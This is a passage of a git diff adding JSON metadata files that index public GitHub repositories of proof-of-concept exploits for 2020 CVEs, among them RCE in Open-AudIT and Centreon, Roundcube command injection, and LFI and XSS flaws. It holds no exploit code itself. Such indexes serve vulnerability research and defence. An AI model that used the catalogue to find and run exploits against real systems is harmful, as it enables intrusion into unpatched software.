"smbleed" + ], + "visibility": "public", + "forks": 45, + "watchers": 145, + "score": 0, + "subscribers_count": 16 + }, + { + "id": 277048370, + "name": "CVE-2020-1206-Exploit", + "full_name": "Info-Security-Solution-Kolkata\/CVE-2020-1206-Exploit", + "owner": { + "login": "Info-Security-Solution-Kolkata", + "id": 67817658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67817658?v=4", + "html_url": "https:\/\/github.com\/Info-Security-Solution-Kolkata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Info-Security-Solution-Kolkata\/CVE-2020-1206-Exploit", + "description": null, + "fork": false, + "created_at": "2020-07-04T05:54:58Z", + "updated_at": "2020-07-04T05:54:58Z", + "pushed_at": "2020-07-04T05:54:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 277049855, + "name": "Smbleed-CVE-2020-1206-Exploit", + "full_name": "Info-Security-Solution-Kolkata\/Smbleed-CVE-2020-1206-Exploit", + "owner": { + "login": "Info-Security-Solution-Kolkata", + "id": 67817658, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/67817658?v=4", + "html_url": "https:\/\/github.com\/Info-Security-Solution-Kolkata", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Info-Security-Solution-Kolkata\/Smbleed-CVE-2020-1206-Exploit", + "description": null, + "fork": false, + "created_at": "2020-07-04T06:06:52Z", + "updated_at": "2020-07-04T06:06:52Z", + "pushed_at": "2020-07-04T06:06:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 327546936, + "name": "CVE-2020-1206", + "full_name": "datntsec\/CVE-2020-1206", + "owner": { + "login": "datntsec", + "id": 70559607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70559607?v=4", + "html_url": "https:\/\/github.com\/datntsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/datntsec\/CVE-2020-1206", + "description": null, + "fork": false, + "created_at": "2021-01-07T08:17:56Z", + "updated_at": "2022-02-15T02:15:46Z", + "pushed_at": "2021-01-13T08:44:58Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12077.json b/2020/CVE-2020-12077.json new file mode 100644 index 0000000000..d030a34c1f --- /dev/null +++ b/2020/CVE-2020-12077.json @@ -0,0 +1,33 @@ +[ + { + "id": 690051066, + "name": "CVE-2020-12077", + "full_name": "RandomRobbieBF\/CVE-2020-12077", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2020-12077", + "description": "MapPress Maps Pro < 2.53.9 - Remote Code Execution (RCE) due to Incorrect Access Control in AJAX Actions", + "fork": false, + "created_at": "2023-09-11T12:43:47Z", + "updated_at": "2024-08-12T20:32:44Z", + "pushed_at": "2023-09-11T13:01:45Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12078.json b/2020/CVE-2020-12078.json new file mode 100644 index 0000000000..0df86794eb --- /dev/null +++ b/2020/CVE-2020-12078.json @@ -0,0 +1,64 @@ +[ + { + "id": 259649899, + "name": "CVE-2020-12078", + "full_name": "mhaskar\/CVE-2020-12078", + "owner": { + "login": "mhaskar", + "id": 6861215, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6861215?v=4", + "html_url": "https:\/\/github.com\/mhaskar", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mhaskar\/CVE-2020-12078", + "description": "The official exploit for Open-AudIT v3.3.1 Remote Code Execution CVE-2020-12078", + "fork": false, + "created_at": "2020-04-28T13:48:27Z", + "updated_at": "2024-08-12T20:00:50Z", + "pushed_at": "2020-04-28T13:51:17Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 268869147, + "name": "CVE-2020-12078", + "full_name": "84KaliPleXon3\/CVE-2020-12078", + "owner": { + "login": "84KaliPleXon3", + "id": 59977956, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59977956?v=4", + "html_url": "https:\/\/github.com\/84KaliPleXon3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/84KaliPleXon3\/CVE-2020-12078", + "description": null, + "fork": false, + "created_at": "2020-06-02T17:44:07Z", + "updated_at": "2020-06-02T17:44:22Z", + "pushed_at": "2020-06-02T17:44:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12112.json b/2020/CVE-2020-12112.json new file mode 100644 index 0000000000..b524f3d96f --- /dev/null +++ b/2020/CVE-2020-12112.json @@ -0,0 +1,36 @@ +[ + { + "id": 258300786, + "name": "CVE-2020-12112", + "full_name": "tchenu\/CVE-2020-12112", + "owner": { + "login": "tchenu", + "id": 17689143, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17689143?v=4", + "html_url": "https:\/\/github.com\/tchenu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tchenu\/CVE-2020-12112", + "description": "BigBlueButton versions lower than 2.2.4 have a LFI vulnerability allowing access to sensitive files. 🚨", + "fork": false, + "created_at": "2020-04-23T18:50:23Z", + "updated_at": "2024-08-12T20:00:37Z", + "pushed_at": "2020-04-23T19:01:22Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bigbluebutton", + "cve" + ], + "visibility": "public", + "forks": 2, + "watchers": 14, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12116.json b/2020/CVE-2020-12116.json new file mode 100644 index 0000000000..848a5dda8f --- /dev/null +++ b/2020/CVE-2020-12116.json @@ -0,0 +1,33 @@ +[ + { + "id": 262366026, + "name": "CVE-2020-12116", + "full_name": "BeetleChunks\/CVE-2020-12116", + "owner": { + "login": "BeetleChunks", + "id": 6037340, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6037340?v=4", + "html_url": "https:\/\/github.com\/BeetleChunks", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BeetleChunks\/CVE-2020-12116", + "description": "Proof of concept code to exploit CVE-2020-12116: Unauthenticated arbitrary file read on ManageEngine OpManger.", + "fork": false, + "created_at": "2020-05-08T15:56:26Z", + "updated_at": "2023-08-20T09:11:51Z", + "pushed_at": "2020-05-08T17:10:48Z", + "stargazers_count": 33, + "watchers_count": 33, + "has_discussions": false, + "forks_count": 13, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 13, + "watchers": 33, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12124.json b/2020/CVE-2020-12124.json new file mode 100644 index 0000000000..5ad4a5c0ae --- /dev/null +++ b/2020/CVE-2020-12124.json @@ -0,0 +1,64 @@ +[ + { + "id": 702540188, + "name": "CVE-2020-12124", + "full_name": "db44k\/CVE-2020-12124", + "owner": { + "login": "db44k", + "id": 147072065, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147072065?v=4", + "html_url": "https:\/\/github.com\/db44k", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/db44k\/CVE-2020-12124", + "description": "An implementation of a proof-of-concept for CVE-2020-12124 (https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2020-12124)", + "fork": false, + "created_at": "2023-10-09T14:07:00Z", + "updated_at": "2023-10-09T14:08:08Z", + "pushed_at": "2023-10-09T14:32:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 733171174, + "name": "CVE-2020-12124", + "full_name": "Scorpion-Security-Labs\/CVE-2020-12124", + "owner": { + "login": "Scorpion-Security-Labs", + "id": 128519225, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/128519225?v=4", + "html_url": "https:\/\/github.com\/Scorpion-Security-Labs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Scorpion-Security-Labs\/CVE-2020-12124", + "description": "An implementation of a proof-of-concept for CVE-2020-12124", + "fork": false, + "created_at": "2023-12-18T18:09:55Z", + "updated_at": "2023-12-18T18:25:21Z", + "pushed_at": "2023-12-18T18:23:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12255.json b/2020/CVE-2020-12255.json new file mode 100644 index 0000000000..d6629211c3 --- /dev/null +++ b/2020/CVE-2020-12255.json @@ -0,0 +1,33 @@ +[ + { + "id": 345188560, + "name": "CVE-2020-12255", + "full_name": "vishwaraj101\/CVE-2020-12255", + "owner": { + "login": "vishwaraj101", + "id": 6264438, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6264438?v=4", + "html_url": "https:\/\/github.com\/vishwaraj101", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vishwaraj101\/CVE-2020-12255", + "description": "Poc for CVE-2020-12255", + "fork": false, + "created_at": "2021-03-06T20:28:43Z", + "updated_at": "2021-03-06T20:28:50Z", + "pushed_at": "2021-03-06T20:28:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12351.json b/2020/CVE-2020-12351.json new file mode 100644 index 0000000000..0340928fa9 --- /dev/null +++ b/2020/CVE-2020-12351.json @@ -0,0 +1,33 @@ +[ + { + "id": 343551675, + "name": "Linux-Heap-Based-Type-Confusion-in-L2CAP", + "full_name": "naren-jayram\/Linux-Heap-Based-Type-Confusion-in-L2CAP", + "owner": { + "login": "naren-jayram", + "id": 25578608, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25578608?v=4", + "html_url": "https:\/\/github.com\/naren-jayram", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/naren-jayram\/Linux-Heap-Based-Type-Confusion-in-L2CAP", + "description": "CVE-2020-12351", + "fork": false, + "created_at": "2021-03-01T20:44:50Z", + "updated_at": "2021-07-15T16:38:54Z", + "pushed_at": "2021-03-10T20:12:14Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12432.json b/2020/CVE-2020-12432.json new file mode 100644 index 0000000000..15428ab8fd --- /dev/null +++ b/2020/CVE-2020-12432.json @@ -0,0 +1,33 @@ +[ + { + "id": 281384090, + "name": "CVE-2020-12432", + "full_name": "d7x\/CVE-2020-12432", + "owner": { + "login": "d7x", + "id": 36901198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36901198?v=4", + "html_url": "https:\/\/github.com\/d7x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d7x\/CVE-2020-12432", + "description": null, + "fork": false, + "created_at": "2020-07-21T11:53:27Z", + "updated_at": "2020-07-21T12:17:54Z", + "pushed_at": "2020-07-21T12:17:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12593.json b/2020/CVE-2020-12593.json new file mode 100644 index 0000000000..6f82d2af26 --- /dev/null +++ b/2020/CVE-2020-12593.json @@ -0,0 +1,33 @@ +[ + { + "id": 354342880, + "name": "CVE-2020-12593", + "full_name": "nasbench\/CVE-2020-12593", + "owner": { + "login": "nasbench", + "id": 8741929, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8741929?v=4", + "html_url": "https:\/\/github.com\/nasbench", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nasbench\/CVE-2020-12593", + "description": "CVE-2020-12593 POC", + "fork": false, + "created_at": "2021-04-03T16:41:24Z", + "updated_at": "2021-07-27T20:42:53Z", + "pushed_at": "2021-04-03T16:42:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12625.json b/2020/CVE-2020-12625.json new file mode 100644 index 0000000000..e022ba9952 --- /dev/null +++ b/2020/CVE-2020-12625.json @@ -0,0 +1,40 @@ +[ + { + "id": 786147293, + "name": "CVE-2020-12625", + "full_name": "mbadanoiu\/CVE-2020-12625", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2020-12625", + "description": "CVE-2020-12625: Cross-Site Scripting via Malicious HTML Attachment in Roundcube Webmail", + "fork": false, + "created_at": "2024-04-13T15:22:23Z", + "updated_at": "2024-04-13T15:30:58Z", + "pushed_at": "2024-04-13T15:51:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cross-site-scripting", + "cve", + "cve-2020-12625", + "cves", + "unauthenticated" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12629.json b/2020/CVE-2020-12629.json new file mode 100644 index 0000000000..2d75f29477 --- /dev/null +++ b/2020/CVE-2020-12629.json @@ -0,0 +1,33 @@ +[ + { + "id": 261207548, + "name": "CVE-2020-12629", + "full_name": "mkelepce\/CVE-2020-12629", + "owner": { + "login": "mkelepce", + "id": 10780392, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/10780392?v=4", + "html_url": "https:\/\/github.com\/mkelepce", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mkelepce\/CVE-2020-12629", + "description": "osTicket 1.14.1 - Persistent Authenticated Cross-Site Scripting", + "fork": false, + "created_at": "2020-05-04T14:37:51Z", + "updated_at": "2020-05-04T14:41:36Z", + "pushed_at": "2020-05-04T14:41:34Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12640.json b/2020/CVE-2020-12640.json new file mode 100644 index 0000000000..9027abbf44 --- /dev/null +++ b/2020/CVE-2020-12640.json @@ -0,0 +1,40 @@ +[ + { + "id": 786156519, + "name": "CVE-2020-12640", + "full_name": "mbadanoiu\/CVE-2020-12640", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2020-12640", + "description": "CVE-2020-12640: Local PHP File Inclusion via \"Plugin Value\" in Roundcube Webmail", + "fork": false, + "created_at": "2024-04-13T15:37:14Z", + "updated_at": "2024-04-13T15:42:59Z", + "pushed_at": "2024-04-13T15:41:40Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2020-12640", + "cves", + "local-file-inclusion", + "path-traversal" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12641.json b/2020/CVE-2020-12641.json new file mode 100644 index 0000000000..0550294352 --- /dev/null +++ b/2020/CVE-2020-12641.json @@ -0,0 +1,77 @@ +[ + { + "id": 783899125, + "name": "CVE-2020-12641", + "full_name": "mbadanoiu\/CVE-2020-12641", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2020-12641", + "description": "CVE-2020-12641: Command Injection via “_im_convert_path” Parameter in Roundcube Webmail", + "fork": false, + "created_at": "2024-04-08T19:48:16Z", + "updated_at": "2024-04-08T20:00:29Z", + "pushed_at": "2024-04-08T19:57:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2020-12641", + "cves", + "remote-code-execution", + "unauthenticated" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 786162983, + "name": "MAL-004", + "full_name": "mbadanoiu\/MAL-004", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/MAL-004", + "description": "MAL-004: Command Injection Bypass for CVE-2020-12641 in Roundcube Webmail", + "fork": false, + "created_at": "2024-04-13T15:59:47Z", + "updated_at": "2024-04-13T16:16:39Z", + "pushed_at": "2024-04-13T16:13:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "bypass", + "cve-2020-12641", + "remote-code-execution", + "unauthenticated" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12688.json b/2020/CVE-2020-12688.json new file mode 100644 index 0000000000..3eddb7c52b --- /dev/null +++ b/2020/CVE-2020-12688.json @@ -0,0 +1,33 @@ +[ + { + "id": 260327143, + "name": "Centreon-20.04", + "full_name": "TheCyberGeek\/Centreon-20.04", + "owner": { + "login": "TheCyberGeek", + "id": 52138157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/52138157?v=4", + "html_url": "https:\/\/github.com\/TheCyberGeek", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TheCyberGeek\/Centreon-20.04", + "description": "CVE-2020-12688 - Authenticated RCE Centreon 20.04", + "fork": false, + "created_at": "2020-04-30T21:59:52Z", + "updated_at": "2021-02-09T23:36:46Z", + "pushed_at": "2021-02-09T23:36:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12695.json b/2020/CVE-2020-12695.json new file mode 100644 index 0000000000..144c8115a4 --- /dev/null +++ b/2020/CVE-2020-12695.json @@ -0,0 +1,64 @@ +[ + { + "id": 270575324, + "name": "CallStranger", + "full_name": "yunuscadirci\/CallStranger", + "owner": { + "login": "yunuscadirci", + "id": 7267858, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7267858?v=4", + "html_url": "https:\/\/github.com\/yunuscadirci", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yunuscadirci\/CallStranger", + "description": "Vulnerability checker for Callstranger (CVE-2020-12695)", + "fork": false, + "created_at": "2020-06-08T07:37:49Z", + "updated_at": "2024-11-14T18:57:52Z", + "pushed_at": "2021-08-07T16:48:55Z", + "stargazers_count": 405, + "watchers_count": 405, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 64, + "watchers": 405, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 271296526, + "name": "callstranger-detector", + "full_name": "corelight\/callstranger-detector", + "owner": { + "login": "corelight", + "id": 21672558, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21672558?v=4", + "html_url": "https:\/\/github.com\/corelight", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/corelight\/callstranger-detector", + "description": "Zeek Plugin that detects CallStranger (CVE-2020-12695) attempts (http:\/\/callstranger.com\/)", + "fork": false, + "created_at": "2020-06-10T14:18:34Z", + "updated_at": "2022-11-16T13:43:52Z", + "pushed_at": "2022-10-27T18:13:09Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 6, + "score": 0, + "subscribers_count": 7 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12696.json b/2020/CVE-2020-12696.json new file mode 100644 index 0000000000..355bd6937c --- /dev/null +++ b/2020/CVE-2020-12696.json @@ -0,0 +1,33 @@ +[ + { + "id": 262085427, + "name": "CVE-2020-12696", + "full_name": "g-rubert\/CVE-2020-12696", + "owner": { + "login": "g-rubert", + "id": 40837605, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40837605?v=4", + "html_url": "https:\/\/github.com\/g-rubert", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/g-rubert\/CVE-2020-12696", + "description": "Stored Cross Site Scripting - Iframe Plugin - WordPress ", + "fork": false, + "created_at": "2020-05-07T15:16:39Z", + "updated_at": "2022-05-05T14:46:04Z", + "pushed_at": "2022-05-05T14:46:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12702.json b/2020/CVE-2020-12702.json new file mode 100644 index 0000000000..e818693a5a --- /dev/null +++ b/2020/CVE-2020-12702.json @@ -0,0 +1,64 @@ +[ + { + "id": 233234379, + "name": "ESPTouchCatcher", + "full_name": "salgio\/ESPTouchCatcher", + "owner": { + "login": "salgio", + "id": 32614646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32614646?v=4", + "html_url": "https:\/\/github.com\/salgio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/salgio\/ESPTouchCatcher", + "description": "eWeLinkESPT is a tool that automatically decodes and decrypts the WiFi network credentials transmitted to a supported ESP-based IoT device by the eWeLink mobile application. (CVE-2020-12702)", + "fork": false, + "created_at": "2020-01-11T13:15:53Z", + "updated_at": "2022-09-12T15:53:27Z", + "pushed_at": "2021-02-24T13:35:11Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 4, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 364290310, + "name": "eWeLink-QR-Code", + "full_name": "salgio\/eWeLink-QR-Code", + "owner": { + "login": "salgio", + "id": 32614646, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32614646?v=4", + "html_url": "https:\/\/github.com\/salgio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/salgio\/eWeLink-QR-Code", + "description": "This repo describes a vulnerability affecting the QR code based pairing process of the eWeLink IoT devices (CVE-2020-12702).", + "fork": false, + "created_at": "2021-05-04T14:50:07Z", + "updated_at": "2021-05-04T14:59:05Z", + "pushed_at": "2021-05-04T14:52:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12712.json b/2020/CVE-2020-12712.json new file mode 100644 index 0000000000..bd6637d308 --- /dev/null +++ b/2020/CVE-2020-12712.json @@ -0,0 +1,33 @@ +[ + { + "id": 272383953, + "name": "CVE-2020-12712", + "full_name": "SanderUbink\/CVE-2020-12712", + "owner": { + "login": "SanderUbink", + "id": 14817544, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14817544?v=4", + "html_url": "https:\/\/github.com\/SanderUbink", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SanderUbink\/CVE-2020-12712", + "description": "Description and public exploit for CVE-2020-12712", + "fork": false, + "created_at": "2020-06-15T08:32:08Z", + "updated_at": "2020-06-15T08:40:02Z", + "pushed_at": "2020-06-15T08:40:01Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12717.json b/2020/CVE-2020-12717.json new file mode 100644 index 0000000000..8b8b2067c8 --- /dev/null +++ b/2020/CVE-2020-12717.json @@ -0,0 +1,33 @@ +[ + { + "id": 263045751, + "name": "covidsafe-CVE-2020-12717-exploit", + "full_name": "wabzqem\/covidsafe-CVE-2020-12717-exploit", + "owner": { + "login": "wabzqem", + "id": 1582274, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1582274?v=4", + "html_url": "https:\/\/github.com\/wabzqem", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/wabzqem\/covidsafe-CVE-2020-12717-exploit", + "description": "Code for exploit for CVE-2020-12717", + "fork": false, + "created_at": "2020-05-11T13:09:52Z", + "updated_at": "2024-08-12T20:01:22Z", + "pushed_at": "2023-01-06T05:51:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12753.json b/2020/CVE-2020-12753.json new file mode 100644 index 0000000000..a6184c5d5a --- /dev/null +++ b/2020/CVE-2020-12753.json @@ -0,0 +1,33 @@ +[ + { + "id": 268641580, + "name": "CVE-2020-12753-PoC", + "full_name": "shinyquagsire23\/CVE-2020-12753-PoC", + "owner": { + "login": "shinyquagsire23", + "id": 1224096, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1224096?v=4", + "html_url": "https:\/\/github.com\/shinyquagsire23", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shinyquagsire23\/CVE-2020-12753-PoC", + "description": "A proof-of-concept for CVE-2020-12753", + "fork": false, + "created_at": "2020-06-01T21:58:42Z", + "updated_at": "2024-10-08T13:52:59Z", + "pushed_at": "2020-06-01T22:55:46Z", + "stargazers_count": 40, + "watchers_count": 40, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 40, + "score": 0, + "subscribers_count": 6 + } +] \ No newline at end of file diff --git a/2020/CVE-2020-12800.json b/2020/CVE-2020-12800.json new file mode 100644 index 0000000000..d7696df2a1 --- /dev/null +++ b/2020/CVE-2020-12800.json @@ -0,0 +1,33 @@ +[ + { + "id": 264069708, + 